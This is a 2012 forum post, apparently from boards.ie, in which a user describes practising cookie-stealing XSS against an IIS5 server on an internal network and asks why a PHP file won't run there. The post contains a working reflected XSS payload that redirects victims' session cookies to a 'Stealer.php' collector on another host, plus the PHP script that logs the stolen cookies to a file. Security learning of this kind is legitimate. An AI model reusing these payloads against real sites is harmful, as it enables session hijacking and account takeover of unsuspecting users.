If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)

Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Hi all,
Vanilla are planning an update to the site on April 24th (next Wednesday). It is a major PHP8 update which is expected to boost performance across the site. The site will be down from 7pm and it is expected to take about an hour to complete. We appreciate your patience during the update.
Thanks all.

XSS Cookie stealing against IIS5 server

CFC1969 · 2012-06-29 23:22:20

A Chara Am playing with cookie stealing (XSS) against IIS5 server on internal network. Injecting this code in forum mail: hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script> When I logout and relogin as new user, I get the PHP popping up, asking do…

30-06-2012 12:22am

#1

CFC1969

Registered Users Posts: 296 ✭✭

Join Date: June 2008

Posts: 224

A Chara

Am playing with cookie stealing (XSS) against IIS5 server on internal network.

Injecting this code in forum mail:

hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script>

When I logout and relogin as new user, I get the PHP popping up, asking do I want to open with notepad.

Can you load PHP files on IIS , Everything on server is ASP ...

BELOW IS SCRIPT

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

0